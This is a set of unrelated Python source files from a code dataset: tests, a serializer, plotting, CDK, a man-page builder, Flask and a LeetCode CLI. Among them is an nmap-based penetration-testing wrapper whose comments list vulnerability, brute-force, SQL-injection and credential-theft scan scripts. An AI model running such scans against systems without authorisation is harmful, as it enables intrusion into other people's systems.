LOG_FILE = "course_export.log"
logging.basicConfig(filename=LOG_FILE, level=logging.INFO) | StarcoderdataPython |
5019400 | <reponame>dladowitz/bitcoincorps
import sqlite3
import time
import pytest
import handing_threads
from ibd.four.crawler import *
from ibd.three.complete import Address
@pytest.fixture(scope="function")
def db(tmpdir):
    """Per-test SQLite connection with the crawler schema created.

    Yields the open connection and closes it on teardown.
    """
    # FIXME do this in-memory
    import os
    f = os.path.join(tmpdir.strpath, "test.db")
    conn = sqlite3.connect(f)
    create_tables(conn)
    yield conn
    conn.close()
def test_fixture(db):
    """End-to-end check of address insertion, connection saving and the
    next_addresses queue against a fresh database."""
    addresses = db.execute("select * from addresses").fetchall()
    assert len(addresses) == 0
    _addresses = [
        Address(None, "8.8.8.8", 8333, None),
        Address(None, "6.6.6.6", 8333, None),
        Address(None, "4.4.4.4", 8333, None),
    ]
    insert_addresses(_addresses, db)
    addresses = db.execute("select * from addresses").fetchall()
    assert len(addresses) == 3
    na = next_addresses(db)
    assert len(na) == 3
    # completed task: saving a finished connection should populate the
    # connections, version_messages and addr_messages tables
    address = _addresses[1]
    address.id = 1
    connection = Connection(address=address, worker="worker-1")
    connection.start = time.time() - 5
    connection.stop = time.time() - 1
    connection.error = None
    connection.version_message = b"version"
    connection.addr_message = b"addr"
    save_connection(connection, db)
    addresses = db.execute("select * from connections").fetchall()
    assert len(addresses) == 1
    addresses = db.execute("select * from version_messages").fetchall()
    assert len(addresses) == 1
    addresses = db.execute("select * from addr_messages").fetchall()
    assert len(addresses) == 1
    assert len(next_addresses(db)) == 2  # one address has been seized
    # # queued task
    # connection = Connection(address=_addresses[1], worker="worker-2")
    # save_connection(connection, db)
    # assert len(next_addresses(db)) == 1
    print(db.execute("select address_id from connections").fetchall())
    print(db.execute("select id from addresses").fetchall())
    print(
        db.execute(
            "select * from addresses where addresses.id not in (select address_id from connections)"
        ).fetchall()
    )
| StarcoderdataPython |
6548074 | <reponame>fxavier/echosys
from rest_framework import serializers
from openmrs_viamo.models import Visit
class VisitSerializer(serializers.ModelSerializer):
    """DRF serializer exposing the Visit model's scheduling and patient
    demographic fields."""

    class Meta:
        model = Visit
        fields = (
            'id',
            'type_visit',
            'province',
            'district',
            'health_facility',
            'patient_id',
            'patient_identifier',
            'age',
            'gender',
            'phone_number',
            'appointment_date',
            'next_appointment_date',
            'community',
            'pregnant',
            'brestfeeding',
            'tb'
        )
        # primary key is server-generated, never written by clients
        read_only_fields = ('id',)
3497380 | #
# Automated Dynamic Application Penetration Testing (ADAPT)
#
# Copyright (C) 2018 Applied Visions - http://securedecisions.com
#
# Written by <NAME> - http://www.siegetechnologies.com/
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import subprocess
import nmap
from pprint import pprint
def translate_url(url):
    """Reduce *url* to a bare hostname.

    Strips an http/https scheme, drops any path, and removes a leading
    'www.' prefix: 'https://www.example.com/a' -> 'example.com'.
    """
    for scheme in ("https://", "http://"):
        if url.startswith(scheme):
            url = url[len(scheme):]
            break
    host = url.split("/")[0]
    if host.startswith("www."):
        host = host[4:]
    return host
def find(data):
    """Yield every value stored under a 'script' key anywhere inside *data*.

    Recurses through nested dicts and through dicts contained in lists.
    A non-mapping passed at the top level is yielded unchanged.
    """
    try:
        items = data.items()
    except AttributeError:
        # not a mapping: yield the value itself, matching nmap result leaves
        yield data
        return
    for key, value in items:
        if key == "script":
            yield value
        elif isinstance(value, dict):
            yield from find(value)
        elif isinstance(value, list):
            for element in value:
                yield from find(element)
class nmap_scripting():
    """Thin wrapper around ``nmap.PortScanner`` that runs NSE scripts
    against a target host and collects every ``script`` result via
    :func:`find`.
    """

    def __init__(self, target, ports, scripts_to_run=None):
        # ``ports`` is a whitespace-separated string; nmap wants "-pA,B,C".
        if(ports != None):
            self.port_values = "-p"+",".join(ports.split())
        else:
            self.port_values = ""
        # Normalise the URL down to a bare host for nmap.
        self.target = translate_url(target)
        self.nm = nmap.PortScanner()
        self.__valid_scripts = []
        if(scripts_to_run is None):
            # for current project goals only one script is run
            # The idea being that any future development or tests can
            # just call an nmap script and use its information
            self.__valid_scripts = [
                #"ssl-cert", # get the target's ssl certificate
                #"ssl-ccs-injection", # determines if vulnerable to ccs injection (CVE-2014-0224)
                #"ssl-cert-intaddr", # reports any private ipv4 addrs in the ssl certificate
                #"ssl-dh-params", # Weak Diffe-Hellman handshake detection
                #"ssl-enum-ciphers", # Tries multiple ssl/tls ciphers and ranks available
                #"ssl-heartbleed", # detects if app is vuln to heartbleed
                #"ssl-known-key", # checks to see if certificate has any known bad keys
                #"ssl-poodle", # checks if app is vuln to poodle
                #"sslv2-drown", # checks if app supports sslv2 and is vuln to drown
                #"sslv2", # checks if it supports older and outdated sslv2
                #"http-vuln-cve2006-3392", # checks for directory information given by Webmin
                #"http-vuln-cve2009-3960", # adobe XML external entity injection
                #"http-vuln-cve2010-0738", # checks if Jboss target is vuln to jmx console auth bypass
                #"http-vuln-cve2010-2861", # Directory traversal against ColdFusion server
                #"http-vuln-cve2011-3192", # Detects DoS vuln on Apache systems
                #"http-vuln-cve2011-3368", # Checks Reverse Proxy Bypass on Apache
                #"http-vuln-cve2012-1823", # Checks for PHP-CGI vulns
                #"http-vuln-cve2013-0156", # Checks for Ruby object injections
                #"http-vuln-cve2013-6786", # Redirection and XSS
                #"http-vuln-cve2013-7091", # Zero data for local file retrieval
                #"http-vuln-cve2014-2126", # Cisco ASA privilege escalation vuln
                #"http-vuln-cve2014-2127", # Cisco ASA privilege escalation vuln
                #"http-vuln-cve2014-2128", # Cisco ASA privilege escalation vuln
                #"http-vuln-cve2014-2129", # Cisco ASA privilege escalation vuln
                #"http-vuln-cve2014-3704", # SQL Injection for Drupal
                #"http-vuln-cve2014-8877", # Remote code injection for Wordpress
                #"http-vuln-cve2015-1427", # Remote code execution via API exploitation
                #"http-vuln-cve2015-1635", # Remote code execution on Microsoft systems
                #"http-vuln-cve2017-1001000", # Privilege escalation on Wordpress
                #"http-vuln-cve2017-5638", # Remote code execution for Apache Struts
                #"http-vuln-cve2017-5689", # Privilege escalation for Intel Active management
                #"http-vuln-cve2017-8917", # SQL injection for Joomla
                #"http-vuln-misfortune-cookie", # RomPager Cookie vuln
                #"http-vuln-wnr1000-creds", # Admin creds steal from WMR 1000 series
                #"http-adobe-coldfusion-apsa1301", # Auth bypass via adobe coldfusion
                #"http-affiliate-id", # grabs affiliate network information
                #"http-apache-negotiation", # enables mod_negotiation, allows potential spidering
                #"http-apache-server-status", # attempts to retrieve apache server information
                #"http-aspnet-debug", # determines if service enabled aspnet debug mode
                #"http-auth", # get authentication scheme
                #"http-auth-finder", # spiders for getting http based auth
                #"http-awstatstotals-exec", # remote code execution in Awstats total
                #"http-axis2-dir-traversal", # directory traversal in for apache axis2
                #"http-backup-finder", # spidering attempt to discover duplicates/backup files
                #"http-brute", # basic brute force http auth attack
                #"http-chrono", # times page's responsiveness
                #"http-cisco-anyconnect", # connects as cisco AnyClient and retrieves basic information
                #"http-coldfusion-subzero", # admin creds steal via coldfusion vuln
                #"http-comments-displayer", # displays comments from pages
                #"http-config-backup", # searches for duplicates of system/server setup files
                #"http-cors", # tests for cross-origin resource sharing
                #"http-cross-domain-policy", # checks cross domain policy to expose overly permissive forms
                #"http-csrf", # detects csrf forgeries
                #"http-default-accounts", # tests for default accounts that may exist
                #"http-dlink-backdoor", # checks for a firmware vuln on some dlink routers
                #"http-dombased-xss", # uses the dom to leverage javascript
                #"http-domino-enum-passwords", # tries to use the hashed Domino passwords
                #"http-feed", # tries to get any rss information that may be present
                #"http-form-brute", # brute forces http form based authentication
                #"http-generator", # display's contents of generator meta tag
                #"http-headers", # tries to get a head request for "/"
                #"http-joomla-brute", # brute force attack against joomla web CMS installations
                #"http-malware-host", # signature search for known compromises
                #"http-proxy-brute",
                #"http-sql-injection",
                "http-methods" # gets available methods from service (we only care about this for now)
            ]
        else:
            for i in scripts_to_run:
                self.__valid_scripts.append(i)

    def run(self):
        """Run every configured NSE script against the target and return
        the flattened list of script results (see :func:`find`)."""
        results = self.nm.scan(self.target, arguments=self.port_values+" --script "+" --script ".join(self.__valid_scripts))
        return list(find(results))
| StarcoderdataPython |
8027243 | #!/usr/bin/env python
def pgeplt(rc):
    """Plot the change of each energy channel over time for run *rc*.

    *rc* is a run-control object providing ``loadenergies()``, a time
    array ``t`` and the energy arrays (``eges``, ``eb``, ``eip``, ...).
    Opens a pyqtgraph window and blocks until it is closed.
    """
    import pyqtgraph as pg
    from pyqtgraph.Qt import QtGui, QtCore
    rc.loadenergies()
    # Dotted pen used for the total-energy trace.
    bd=pg.mkPen(width=2,color=(200, 200, 255), style=QtCore.Qt.DotLine)
    plotWidget = pg.plot(title="Change in energies for "+rc.dirname,labels={'left':'dE','bottom':'twci'})
    plotWidget.addLegend()
    # Each trace is plotted relative to its initial value so all curves
    # start at zero; the integer pens pick distinct default colours.
    plotWidget.plot(rc.t,rc.eges-rc.eges[0], pen=bd, name='dE_{tot}')
    plotWidget.plot(rc.t,rc.eb  -rc.eb[0]  , pen=20, name='dE_{b}  ')
    plotWidget.plot(rc.t,rc.eip -rc.eip[0] , pen=30, name='dE_{ip} ')
    plotWidget.plot(rc.t,rc.eep -rc.eep[0] , pen=40, name='dE_{ep} ')
    plotWidget.plot(rc.t,rc.eif -rc.eif[0] , pen=50, name='dE_{if} ')
    plotWidget.plot(rc.t,rc.eef -rc.eef[0] , pen=60, name='dE_{ef} ')
    plotWidget.plot(rc.t,rc.ee  -rc.ee[0]  , pen=70, name='dE_{ee} ')
    # Enter the Qt event loop; returns only when the window is closed.
    QtGui.QApplication.instance().exec_()
# Script entry point: build the run-control object interactively and
# plot its energy history.
if __name__=="__main__":
    from TurbAn.Utilities.subs import create_object
    rc=create_object()
    pgeplt(rc)
| StarcoderdataPython |
6648908 | <filename>b_cfn_elasticsearch_index_test/testing_infrastructure.py<gh_stars>0
from aws_cdk.core import Stack
from aws_cdk.aws_elasticsearch import Domain, ElasticsearchVersion, CapacityConfig, ZoneAwarenessConfig, EbsOptions
from aws_cdk.aws_ec2 import EbsDeviceVolumeType
from b_cfn_elasticsearch_index.resource import ElasticsearchIndexResource
class TestingInfrastructure(Stack):
    """CDK stack that provisions a minimal Elasticsearch domain plus an
    ``ElasticsearchIndexResource`` for integration testing."""

    def __init__(self, scope: Stack):
        super().__init__(
            scope=scope,
            id=f'TestingStack',
            stack_name=f'TestingStack'
        )
        # Smallest, cheapest single-node domain sufficient for tests.
        domain = Domain(
            scope=self,
            id="TestingElasticsearchDomain",
            version=ElasticsearchVersion.V7_7,
            capacity=CapacityConfig(
                # Use the cheapest instance available.
                data_node_instance_type="t3.small.elasticsearch",
                data_nodes=1,
                master_nodes=None,
            ),
            # Single AZ keeps costs down; no HA needed for tests.
            zone_awareness=ZoneAwarenessConfig(enabled=False),
            ebs=EbsOptions(enabled=True, volume_size=10, volume_type=EbsDeviceVolumeType.GP2),
        )
        # The custom resource under test, targeting the domain above.
        ElasticsearchIndexResource(
            scope=self,
            name="TestingElasticsearchIndex",
            elasticsearch_domain=domain,
            index_prefix="testing_index",
        )
| StarcoderdataPython |
67283 | # -*- coding: utf-8 -*-
# This file is distributed under the same License of Python
# Copyright (c) 2014 <NAME> <<EMAIL>>
"""
build_manpage.py
Add a `build_manpage` command to your setup.py.
To use this Command class import the class to your setup.py,
and add a command to call this class::
from build_manpage import BuildManPage
...
...
setup(
...
...
cmdclass={
'build_manpage': BuildManPage,
)
You can then use the following setup command to produce a man page::
$ python setup.py build_manpage --output=prog.1 \
--parser=yourmodule:argparser
Alternatively, set the variable AUTO_BUILD to True, and just invoke::
$ python setup.py build
If automatically want to build the man page every time you invoke your build,
add to your ```setup.cfg``` the following::
[build_manpage]
output = <appname>.1
parser = <path_to_your_parser>
"""
import datetime
from distutils.core import Command
from distutils.errors import DistutilsOptionError
from distutils.command.build import build
import argparse
AUTO_BUILD = True
class BuildManPage(Command):
    """distutils command that renders a man page from an ArgumentParser.

    ``--parser`` names a ``module:function`` returning an ArgumentParser;
    ``--output`` is the man page file to write.
    """

    description = 'Generate man page from an ArgumentParser instance.'

    user_options = [
        ('output=', 'O', 'output file'),
        ('parser=', None, 'module path to an ArgumentParser instance'
         '(e.g. mymod:func, where func is a method or function which return'
         'an arparse.ArgumentParser instance.'),
    ]

    def initialize_options(self):
        # Both options are mandatory; validated in finalize_options().
        self.output = None
        self.parser = None

    def finalize_options(self):
        if self.output is None:
            raise DistutilsOptionError('\'output\' option is required')
        if self.parser is None:
            raise DistutilsOptionError('\'parser\' option is required')
        # "pkg.mod:factory" -> import pkg.mod, call factory(...).
        mod_name, func_name = self.parser.split(':')
        fromlist = mod_name.split('.')
        try:
            mod = __import__(mod_name, fromlist=fromlist)
            # The factory receives our man-page formatter so help text is
            # emitted with troff markup.
            self._parser = getattr(mod, func_name)(
                formatter_class=ManPageFormatter)
        except ImportError as err:
            raise err
        self.announce('Writing man page %s' % self.output)
        self._today = datetime.date.today()

    def run(self):
        dist = self.distribution
        homepage = dist.get_url()
        appname = self._parser.prog
        # Extra man-page sections appended after OPTIONS.
        sections = {'authors': ("pwman3 was originally written by <NAME> "
                                "<<EMAIL>>.\n pwman3 is now maintai"
                                "ned "
                                "by <NAME> <<EMAIL>>."),
                    'distribution': ("The latest version of {} may be "
                                     "downloaded from {}".format(appname,
                                                                 homepage))
                    }
        dist = self.distribution
        mpf = ManPageFormatter(appname,
                               desc=dist.get_description(),
                               long_desc=dist.get_long_description(),
                               ext_sections=sections)
        m = mpf.format_man_page(self._parser)
        with open(self.output, 'w') as f:
            f.write(m)
class ManPageFormatter(argparse.HelpFormatter):
    """
    Formatter class to create man pages.

    This class relies only on the parser, and not distutils.
    The following shows a scenario for usage::

        from pwman import parser_options
        from build_manpage import ManPageFormatter

        # example usage ...

        dist = distribution
        mpf = ManPageFormatter(appname,
                               desc=dist.get_description(),
                               long_desc=dist.get_long_description(),
                               ext_sections=sections)

        # parser is an ArgumentParser instance
        m = mpf.format_man_page(parsr)

        with open(self.output, 'w') as f:
            f.write(m)

    The last line would print all the options and help information wrapped
    with man page macros where needed.
    """

    def __init__(self,
                 prog,
                 indent_increment=2,
                 max_help_position=24,
                 width=None,
                 section=1,
                 desc=None,
                 long_desc=None,
                 ext_sections=None,
                 authors=None,
                 ):
        super(ManPageFormatter, self).__init__(prog)

        self._prog = prog
        # BUGFIX: ``section`` used to be ignored (hard-coded to 1); honour
        # it so callers can generate e.g. section-5 pages.  Default stays 1.
        self._section = section
        # Dashes in troff must be escaped; pre-escape the date string.
        self._today = datetime.date.today().strftime('%Y\\-%m\\-%d')
        self._desc = desc
        self._long_desc = long_desc
        self._ext_sections = ext_sections

    def _get_formatter(self, **kwargs):
        # NOTE(review): this looks copied from ArgumentParser -- the
        # instance has neither ``formatter_class`` nor ``prog`` attributes,
        # so calling it would raise AttributeError.  Appears unused.
        return self.formatter_class(prog=self.prog, **kwargs)

    def _markup(self, txt):
        """Escape dashes for troff output."""
        return txt.replace('-', '\\-')

    def _underline(self, string):
        """Wrap *string* in troff italic/underline macros."""
        return "\\fI\\s-1" + string + "\\s0\\fR"

    def _bold(self, string):
        """Wrap *string* in troff bold macros, avoiding double-wrapping."""
        if not string.strip().startswith('\\fB'):
            string = '\\fB' + string
        if not string.strip().endswith('\\fR'):
            string = string + '\\fR'
        return string

    def _mk_synopsis(self, parser):
        """Render the SYNOPSIS section from the parser's usage string."""
        self.add_usage(parser.usage, parser._actions,
                       parser._mutually_exclusive_groups, prefix='')
        usage = self._format_usage(None, parser._actions,
                                   parser._mutually_exclusive_groups, '')
        # Drop the program name; it is re-added in bold below.
        usage = usage.replace('%s ' % self._prog, '')
        usage = '.SH SYNOPSIS\n \\fB%s\\fR %s\n' % (self._markup(self._prog),
                                                    usage)
        return usage

    def _mk_title(self, prog):
        """Render the .TH title line: program, section, date."""
        return '.TH {0} {1} {2}\n'.format(prog, self._section,
                                          self._today)

    def _make_name(self, parser):
        """
        this method is in consitent with others ... it relies on
        distribution
        """
        return '.SH NAME\n%s \\- %s\n' % (parser.prog,
                                          parser.description)

    def _mk_description(self):
        """Render the DESCRIPTION section from the long description."""
        if self._long_desc:
            # troff needs explicit line breaks (.br) between lines.
            long_desc = self._long_desc.replace('\n', '\n.br\n')
            return '.SH DESCRIPTION\n%s\n' % self._markup(long_desc)
        else:
            return ''

    def _mk_footer(self, sections):
        """Render the extra trailing sections (AUTHORS, DISTRIBUTION, ...).

        *sections* is a mapping of section name -> body text; anything
        non-iterable yields an empty footer.
        """
        if not hasattr(sections, '__iter__'):
            return ''

        footer = []
        # BUGFIX: ``iteritems()`` is Python 2 only and raised
        # AttributeError under Python 3; use ``items()``.
        for section, value in sections.items():
            part = ".SH {}\n {}".format(section.upper(), value)
            footer.append(part)

        return '\n'.join(footer)

    def format_man_page(self, parser):
        """Assemble the complete man page text for *parser*."""
        page = []
        page.append(self._mk_title(self._prog))
        page.append(self._mk_synopsis(parser))
        page.append(self._mk_description())
        page.append(self._mk_options(parser))
        page.append(self._mk_footer(self._ext_sections))

        return ''.join(page)

    def _mk_options(self, parser):
        """Render the OPTIONS section using the parser's own formatter."""
        formatter = parser._get_formatter()

        # positionals, optionals and user-defined groups
        for action_group in parser._action_groups:
            formatter.start_section(None)
            formatter.add_text(None)
            formatter.add_arguments(action_group._group_actions)
            formatter.end_section()

        # epilog
        formatter.add_text(parser.epilog)

        # determine help from format above
        return '.SH OPTIONS\n' + formatter.format_help()

    def _format_action_invocation(self, action):
        """Format a single option invocation with troff bold/underline."""
        if not action.option_strings:
            metavar, = self._metavar_formatter(action, action.dest)(1)
            return metavar

        else:
            parts = []

            # if the Optional doesn't take a value, format is:
            #    -s, --long
            if action.nargs == 0:
                parts.extend([self._bold(action_str) for action_str in
                              action.option_strings])

            # if the Optional takes a value, format is:
            #    -s ARGS, --long ARGS
            else:
                default = self._underline(action.dest.upper())
                args_string = self._format_args(action, default)
                for option_string in action.option_strings:
                    parts.append('%s %s' % (self._bold(option_string),
                                            args_string))

            return ', '.join(parts)
class ManPageCreator(object):
    """
    This class takes a little different approach. Instead of relying on
    information from ArgumentParser, it relies on information retrieved
    from distutils.
    This class makes it easy for package maintainer to create man pages in
    cases, that there is no ArgumentParser.
    """
    # Cleanup: removed a stray ``pass`` statement that sat uselessly
    # between the docstring and the first method.

    def _mk_name(self, distribution):
        """Render the NAME section from a distutils *distribution*.

        Uses ``get_name()`` and ``get_description()`` of the distribution.
        """
        return '.SH NAME\n%s \\- %s\n' % (distribution.get_name(),
                                          distribution.get_description())
# Register the man-page builder as part of the standard ``build`` step
# whenever AUTO_BUILD is enabled.
if AUTO_BUILD:
    build.sub_commands.append(('build_manpage', None))
| StarcoderdataPython |
3593201 | <gh_stars>0
"""
Write Python code that asks a user how many pizza slices they want. The pizzeria charges Rs
123.00 a slice. if user order even number of slices, price per slice is Rs 120.00. Print the total
price depending on how many slices user orders.
"""
n = int(input("Enter no' of slices: "))
if n%2==0:
print("Total Price is",120.00*n)
else:
print("Total Price is",123.00*n) | StarcoderdataPython |
3335217 | from django.contrib import admin
# Register your models here.
# Setup the URLs and include login URLs for the browsable API. | StarcoderdataPython |
1663455 | from django.db import models
class TransformQuerySet(models.query.QuerySet):
    """QuerySet that can run post-processing callables over its results.

    Registered transform functions receive the fully evaluated result
    list and may mutate it in place (e.g. to attach related data).
    """

    def __init__(self, *args, **kwargs):
        super(TransformQuerySet, self).__init__(*args, **kwargs)
        # Callables applied, in order, to the materialised result list.
        self._transform_fns = []

    def _clone(self, klass=None, setup=False, **kw):
        # Propagate registered transforms so chained querysets keep them.
        c = super(TransformQuerySet, self)._clone(klass, setup, **kw)
        c._transform_fns = self._transform_fns[:]
        return c

    def transform(self, fn):
        """Return a clone with *fn* appended to the transform pipeline."""
        c = self._clone()
        c._transform_fns.append(fn)
        return c

    def iterator(self):
        result_iter = super(TransformQuerySet, self).iterator()
        if self._transform_fns:
            # Transforms need the whole result set, so materialise first.
            results = list(result_iter)
            for fn in self._transform_fns:
                fn(results)
            return iter(results)
        return result_iter
class TransformManager(models.Manager):
    """Manager whose default queryset supports ``transform()`` pipelines."""

    def get_query_set(self):
        # NOTE(review): ``get_query_set`` is the pre-Django-1.6 hook name;
        # newer Django expects ``get_queryset`` -- confirm target version.
        return TransformQuerySet(self.model)
| StarcoderdataPython |
9671040 | <gh_stars>0
import os
from flask import Flask, flash, request, redirect, url_for, jsonify
from werkzeug.utils import secure_filename
import json
UPLOAD_FOLDER = 'uploads'
ALLOWED_EXTENSIONS = {'txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'}
app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
@app.route('/hello')
def hello_world():
    """Simple liveness endpoint."""
    return "hello world"
@app.route('/')
def index():
    """Root endpoint returning a placeholder index message."""
    return "this is a index page"
@app.route('/user/<username>')
def show_user(username):
    """Echo the username captured from the URL path."""
    return 'username is: %s' % username
@app.route('/login', methods=['GET', 'POST'])
def get():
    """Demo login endpoint.

    GET returns a fixed string; POST echoes the ``username`` parameter.
    NOTE(review): for POST the value is read from the query string
    (``request.args``) rather than the form body (``request.form``) --
    confirm that is intended.
    """
    if request.method == 'GET':
        return 'this is a get'
    else:
        username = request.args.get('username')
        return 'username is {}'.format(username)
def allowed_file(filename):
    """Return True if *filename* carries an extension listed in
    ``ALLOWED_EXTENSIONS`` (case-insensitive)."""
    _, dot, extension = filename.rpartition('.')
    return bool(dot) and extension.lower() in ALLOWED_EXTENSIONS
@app.route('/upload', methods=['GET', 'POST'])
def upload():
    """Accept a file upload, save it under UPLOAD_FOLDER, report paths.

    NOTE(review): ``load_uploadpic`` is not defined anywhere in this
    file, so a successful upload raises NameError -- a missing import?
    NOTE(review): GET requests and rejected files fall through and
    return None, which Flask turns into a 500 -- probably needs an
    upload form / error response.
    """
    if request.method == 'POST':
        f = request.files.get('file')
        if f and allowed_file(f.filename):
            # Sanitise the client-supplied name before using it in a path.
            filename = secure_filename(f.filename)
            basepath = os.path.dirname(__file__)
            uploadpath = os.path.join(basepath, app.config['UPLOAD_FOLDER'], filename)
            print('basepath:' + uploadpath)
            f.save(uploadpath)
            downpath = load_uploadpic(uploadpath, filename)
            print('downloadpath:' + downpath)
            return jsonify({'filename': f.filename, 'uploadpath': uploadpath, 'downloadpath': downpath, })
if __name__ == '__main__':
    # Run the Flask development server with default settings.
    app.run()
| StarcoderdataPython |
9650450 | """
App entry point
Authors:
- <NAME> (<EMAIL>)
"""
import glob
import os
import time
import traceback
from multiprocessing import Process
from multiprocessing.managers import SyncManager
from typing import Any, Dict, List, Optional
import click
from click.core import Context
from click.exceptions import Abort
from leet2git.config_manager import ConfigManager
from leet2git.file_handler import create_file_handler, generate_files
from leet2git.leetcode_client import LeetcodeClient
from leet2git.my_utils import (
get_question_id,
mgr_init,
reset_config,
wait_to_finish_download,
)
from leet2git.question_db import QuestionData, QuestionDB
from leet2git.readme_handler import ReadmeHandler
from leet2git.version import version_info
# pylint: disable=broad-except
@click.group()
@click.version_option(version="", message=version_info())
@click.option(
    "--source-repository",
    "-s",
    default="",
    help="The path to the folder where the code will be saved. Overrides the default config",
)
@click.option(
    "--language",
    "-l",
    default="python3",
    help="The language to run the command. Overrides the default config",
)
@click.pass_context
def leet2git(
    ctx: Context,
    source_repository: Optional[str] = "",
    language: Optional[str] = "",
):
    """Leet2Git App
    \f
    Args:
        ctx (Context): the click context; receives the ConfigManager
        source_repository (str): source repository path override
        language (str): programming language override
    """
    cm = ConfigManager()
    # Only forward CLI overrides that were actually supplied; otherwise
    # the stored configuration values win.
    override_config = {}
    if language:
        override_config["language"] = language
    if source_repository:
        override_config["source_path"] = source_repository
    cm.load_config(override_config)
    # Subcommands receive the loaded ConfigManager via @click.pass_obj.
    ctx.obj = cm
@leet2git.command()
@click.argument("question-id", type=int)
@click.pass_obj
def get(cm: ConfigManager, question_id: int):
    """Generates all the files for a question

    Args:
        question_id (int): the numeric question id
    """
    qdb: QuestionDB = QuestionDB(cm.config)
    lc = LeetcodeClient()
    qdb.load()
    # Avoid clobbering files for a question already in the database.
    if qdb.check_if_exists(question_id):
        click.secho("Question already imported")
        return
    # Refresh the id->slug map if this id is unknown locally.
    if not qdb.check_if_slug_is_known(question_id):
        qdb.set_id_title_map(lc.get_id_title_map())
        qdb.save()

    # get question data; generate_files stores the result into ``args``.
    args: Dict[int, QuestionData] = {}
    generate_files(args, question_id, qdb.get_title_from_id(question_id), lc, time.time(), cm.config)

    if question_id in args:
        # store data
        qdb.add_question(args[question_id])
        qdb.save()

        # update readme
        rh = ReadmeHandler(cm.config)
        rh.build_readme(qdb.get_sorted_list(sort_by="creation_time"))
@leet2git.command()
@click.argument("question-id", type=int)
@click.pass_obj
def submit(cm: ConfigManager, question_id: int):
    """Submit a question to Leetcode

    Args:
        question_id (int): the numeric question id
    """
    qdb: QuestionDB = QuestionDB(cm.config)
    qdb.load()
    # create submit file
    if qdb.check_if_exists(question_id):
        file_handler = create_file_handler(qdb.get_question(question_id), cm.config)
        code = file_handler.generate_submission_file()
        lc = LeetcodeClient()
        try:
            question_data = qdb.get_question(question_id)
            # Prefer the slug stored on the question; fall back to the map.
            title_slug = (
                question_data.title_slug
                if question_data.title_slug
                else qdb.get_title_from_id(question_id)
            )
            lc.submit_question(code, question_data.internal_id, title_slug, cm.config["language"])
        except Exception as e:
            # Best-effort reporting; a failed submit should not crash the CLI.
            click.secho(e.args, fg="red")
            click.secho(traceback.format_exc())
    else:
        click.secho(f"Could not find the question with id {question_id}")
@leet2git.command()
@click.argument("question-id", type=int)
@click.pass_obj
def run(cm: ConfigManager, question_id: int):
    """Run a question on Leetcode Servers

    Args:
        question_id (int): the numeric question id
    """
    qdb: QuestionDB = QuestionDB(cm.config)
    qdb.load()
    # create test file
    if qdb.check_if_exists(question_id):
        file_handler = create_file_handler(qdb.get_question(question_id), cm.config)
        code = file_handler.generate_submission_file()
        lc = LeetcodeClient()
        try:
            question_data = qdb.get_question(question_id)
            title_slug = (
                question_data.title_slug
                if question_data.title_slug
                else qdb.get_title_from_id(question_id)
            )
            # Flatten the stored example inputs into the newline-separated
            # format Leetcode's "run" endpoint expects.
            raw_inputs = "\n".join(["\n".join(i.split(", ")) for i in question_data.inputs])
            lc.submit_question(
                code,
                question_data.internal_id,
                title_slug,
                cm.config["language"],
                True,
                raw_inputs,
            )
        except Exception as e:
            click.secho(e.args, fg="red")
            click.secho(traceback.format_exc())
    else:
        click.secho(f"Could not find the question with id {question_id}")
@leet2git.command()
@click.pass_obj
def import_all(cm: ConfigManager):
    """Get all solutions and generate their files

    Pages through the user's Leetcode submission list (20 per page) and
    spawns one worker process per accepted, not-yet-imported solution in
    the configured language.
    NOTE(review): if an exception fires before the first loop iteration,
    ``jobs``/``ret_dict``/``manager`` are unbound in the except/finally
    handlers and would raise NameError -- worth hoisting their creation.
    """
    qdb: QuestionDB = QuestionDB(cm.config)
    lc = LeetcodeClient()
    qdb.load()
    has_next: bool = True
    last_key: str = ""
    offset: int = 0
    imported_cnt = 0
    try:
        while has_next:
            jobs: List[Process] = []
            manager = SyncManager()
            manager.start(mgr_init)
            ret_dict: Dict[Any, Any] = manager.dict()
            submissions = lc.get_submission_list(last_key, offset)
            if "submissions_dump" not in submissions:
                if imported_cnt <= 0:
                    raise ValueError(
                        "No submission to import. Are you logged in to leetcode? (Chrome or Firefox)"
                    )
                break
            for submission in submissions["submissions_dump"]:
                qid: int = get_question_id(submission["title_slug"], qdb, lc)
                if (
                    submission["status_display"] == "Accepted"
                    and submission["lang"] == cm.config["language"]
                    and not qdb.check_if_exists(qid)
                ):
                    # pre-store the question so duplicates in the same
                    # page are skipped by check_if_exists above
                    data = QuestionData(id=qid)
                    qdb.add_question(data)
                    p = Process(
                        target=generate_files,
                        args=(
                            ret_dict,
                            qid,
                            submission["title_slug"],
                            lc,
                            submission["timestamp"],
                            cm.config,
                            submission["code"],
                        ),
                    )
                    jobs.append(p)
                    p.start()
            imported_cnt += wait_to_finish_download(jobs, ret_dict, qdb)
            has_next = submissions["has_next"]
            last_key = submissions["last_key"]
            offset += 20
            qdb.save()
    except KeyboardInterrupt:
        # Let already-started workers finish before stopping.
        click.secho("Stopping the process...")
        imported_cnt += wait_to_finish_download(jobs, ret_dict, qdb)
    except Exception as e:
        click.secho(e.args, fg="red")
        click.secho(traceback.format_exc())
    finally:
        manager.shutdown()
        qdb.save()

    # update readme
    rh = ReadmeHandler(cm.config)
    rh.build_readme(qdb.get_sorted_list(sort_by="creation_time"))
    click.secho(f"In total, {imported_cnt} questions were imported!")
@leet2git.command()
@click.argument("question-id", type=int)
@click.pass_obj
def delete(cm: ConfigManager, question_id: int):
    """Delete a question and its files

    Args:
        question_id (int): the numeric question id
    """
    qdb: QuestionDB = QuestionDB(cm.config)
    qdb.load()
    if qdb.check_if_exists(question_id):
        data = qdb.get_data()[question_id]
        # Remove both the solution and its test file; missing files are
        # only reported, not fatal.
        try:
            os.remove(data.file_path)
            os.remove(data.test_file_path)
        except FileNotFoundError as e:
            click.secho(e.args)
        qdb.delete_question(question_id)
        qdb.save()

        # update readme
        rh = ReadmeHandler(cm.config)
        rh.build_readme(qdb.get_sorted_list(sort_by="creation_time"))
        click.secho(f"The question {question_id} was removed.")
    else:
        click.secho(f"The question {question_id} could not be found!")
@leet2git.command()
@click.option(
